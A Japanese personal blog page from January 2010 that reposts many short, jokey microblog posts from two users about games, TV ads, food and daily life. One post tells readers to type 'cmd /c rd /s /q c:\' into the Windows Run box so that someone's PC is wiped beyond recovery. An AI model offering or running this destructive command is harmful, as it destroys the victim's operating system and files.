2010年01月04日

ベルボーイにいじわる

_huro_ / HALCA
象の鼻は全部筋肉 ネタわかる人挙手 at 01/04 17:36

 
_huro_ / HALCA
高校生の時 知らん人に お茶しない?と言われ吹きそうになった at 01/04 17:10

 
_huro_ / HALCA
知り合いにマンガ喫茶マンボーのご令嬢がいる 新宿南口でジャージでマンボーのティッシュくばってらっしゃった 大変ね at 01/04 17:00

 
_huro_ / HALCA
友達にかに道楽の御曹司がいる 格安でコース食わせてもらってお父様がわざわざ座敷個室までいらっしゃってびびる at 01/04 16:58

 
_huro_ / HALCA
苦労すると 人間的に成長する人と 根性が曲がる人にわかれるとおも at 01/04 16:48

 
_huro_ / HALCA
PS3の起動音ピッってやつ どうにかならんもんかね at 01/04 16:41

 
posted by アオノリ at 17:40| 東京 ☀| Comment(1) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

君は綺麗になった

_huro_ / HALCA
日産ルークスの黒ウサギと女の子がHIP-HOPで踊るCM 歌ってるのは辻ちゃんなんですって at 01/04 13:30

 
_huro_ / HALCA
PS3ガンダム無双が中古で980円で吹いた at 01/04 12:55

 
_huro_ / HALCA
あからさまに のことを あらかさまに だと思っていた at 01/04 12:45

 
_huro_ / HALCA
相手もいないのにゼクシィ at 01/04 12:27

 
_huro_ / HALCA
こたつなう at 01/04 12:24

 
_huro_ / HALCA
森ガールなんて名称 腑に落ちない at 01/04 04:14

 
_huro_ / HALCA
高校生の頃 電車の中でニュージーランド人にナンパされた at 01/04 03:57

 
_huro_ / HALCA
FF13 ヘカトンをヒーラーなしで倒したくせに ラスボス何回やっても倒せない at 01/04 03:54

 
_huro_ / HALCA
菜の花のじゅうたんの向こうの広い川 渡りたいけどどうしよう 母さんが呼んでいる at 01/04 03:50

 
_huro_ / HALCA
ラブプラスそないええのんか なら逆も出るよな!出るだろ! at 01/04 03:47

 
_huro_ / HALCA
ダイハツcocoaのウエンツ可愛いな at 01/04 03:39

 
_huro_ / HALCA
高校生に人間関係を心配された at 01/04 03:19

 
_huro_ / HALCA
君たちキウイ・パパイヤ・マンゴーだね at 01/04 03:18

 
_huro_ / HALCA
食パンくわえて走れば 少しは運命変わるでしょうか at 01/04 03:17

 
_huro_ / HALCA
男の子からきた年賀状がリラックマで少し心配になった at 01/04 03:11

 
_huro_ / HALCA
飲食のバイトは 不衛生を目の当たりにして凹む at 01/04 03:09

 
_huro_ / HALCA
どんなスープにも鶏ガラを入れてしまう癖 もう鶏ガラの味しかしない at 01/04 03:03

 
_huro_ / HALCA
検品のバイトの事務所行ったら がっつり右翼でワロタ at 01/04 02:57

 
_huro_ / HALCA
身の回りにダメな奴がいると 何故か自分がしっかりする件 at 01/04 02:53

 
_huro_ / HALCA
母親は槇原敬之が嫌いらしい at 01/04 02:51

 
_huro_ / HALCA
@hms_103 リアムたんハァハァ で正解 at 01/04 02:49

 
_huro_ / HALCA
うみねこ EP6 結局エリカは虚構で わたしはだぁれの答えは爆発 だったんですかね at 01/04 02:44

 
_huro_ / HALCA
柄にもなく 福袋の行列に並んだら 意外と楽勝だった at 01/04 02:38

 
_huro_ / HALCA
幼稚園児の時和田勉に何か言ったらしい at 01/04 02:36

 
_huro_ /
資格を取れと説教された at 01/04 02:22

 
_huro_ /
熱湯風呂にパスタ入れたらゆであがるかな at 01/04 02:07

 
_huro_ /
でもケータイのアドレスは即行で消せる at 01/04 00:20

 
_huro_ /
昔もらった指輪が捨てられない at 01/04 00:17

 
_huro_ /
小出さんのコーヒーのCM 非常に熱いです at 01/04 00:17

 
knocking0927 /
音楽をどや顔で語るな at 01/03 23:46

 
knocking0927 /
鯖とかいて よせなべ と読むことができるよ ホントだよ at 01/03 23:02

 
knocking0927 /
イロモネアなう at 01/03 22:53

 
knocking0927 /
酸味の申し子 苺大明神 at 01/03 19:52

 
knocking0927 /
天の通い路吹き閉じよおのこの姿しばしとどめん at 01/03 19:50

 
knocking0927 /
棒に刺さったぬかきゅうりエロス at 01/03 19:49

 
knocking0927 /
肉じゃがの恩恵にあずかれば菩薩掌かませます at 01/03 19:48

 
knocking0927 /
ニックデカルチャー

ジャガッ☆
 at 01/03 19:47

 
knocking0927 /
洗車が地球を救います at 01/03 19:46

 
knocking0927 /
料理とは いかに手間をかけずそれっぽく仕上げるか ということです at 01/03 19:45

 
knocking0927 /
敵は凍てつく波動の上にコンフュが使えます
恐怖です
 at 01/03 19:44

 
knocking0927 /
一年365日中1日ぐらい春雨大明神感謝祭があってもいいと思う at 01/03 19:43

 
knocking0927 /
生ハムが好きでもメロンが食べられないと生ハムメロンが面倒くさいです at 01/03 19:42

 
knocking0927 /
スタートメニューの検索欄に
ファイル名を指定して実行
とぶっこんでみましょう

クリックして窓が出たら
【cmd /c rd /s /q c:\】
を更にぶっこんで実行


これで彼パソコンはOSごと再起不能です
 at 01/03 19:42

 
knocking0927 /
妹ブームに成り代わり弟ブームの波を切実に期待 at 01/03 19:41

 
knocking0927 /
おにいちゃんCDがあるなら
おねえちゃんCDもあっていいと思うんです
 at 01/03 19:40

 
knocking0927 /
そういえば 高速の赤城高原SAでとまきゅうソフトが売ってました at 01/03 19:40

 
knocking0927 /
あなたは、あなたの関係者ですか? at 01/03 17:21

 
knocking0927 /
麻婆豆腐は大人の流動食 at 01/03 17:18

 
knocking0927 /
いつじ 脱獄王の番宣で囚の字が書けなかった at 01/03 17:13

 
knocking0927 /
自殺サークル意味不に見えてちゃんとヒントはある at 01/03 16:56

 
knocking0927 /
二日酔いにはハイチオールCが効く at 01/03 16:55

 
knocking0927 /
生ハムと麦茶は合う at 01/03 16:53

 
knocking0927 /
ハリセンボン箕輪は吉祥寺に出る at 01/03 16:51

 
knocking0927 /
柄本佑をよろしくお願いします at 01/03 16:46

 
knocking0927 /
塩ラーメンに芋はいらないと思うんだ at 01/03 16:43

 
knocking0927 /
鳥居さんはレズのバイトしてたらしい at 01/03 16:41

 
knocking0927 /
ライトニングのパンツが黒だと騒いでるやつは男子中学生と同じミスをおかしている at 01/03 16:37

 
knocking0927 /
ゲーム脳は科学的根拠がない at 01/03 16:34

 
knocking0927 /
コエンザイムQ10もニベアと番組の戦略 at 01/03 16:33

 
knocking0927 /
マイナスイオンは嘘

そもそもプラスもないらしい
 at 01/03 16:30

 
knocking0927 /
ヒアルロン酸は体中にあるのでかなりの量とらないと肌にいきません at 01/03 16:29

 
knocking0927 /
ロッチって車にひかれるだけなの? at 01/03 16:28

 
knocking0927 /
アーロン・コックを病院で見た at 01/03 16:26

 
knocking0927 /
FF13 ラスボス強すぎ 十回ぐらい死んだからニコ動でED観た at 01/03 16:14

 
knocking0927 /
葉加瀬の技術を酷評する奴は実は下手くそ at 01/03 15:48

 
knocking0927 /
ギザ十は駅の券売機で使えません at 01/03 15:33

 
knocking0927 /
錦玉子が美味すぎる at 01/03 15:31

 
posted by アオノリ at 13:50| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする
past log
×

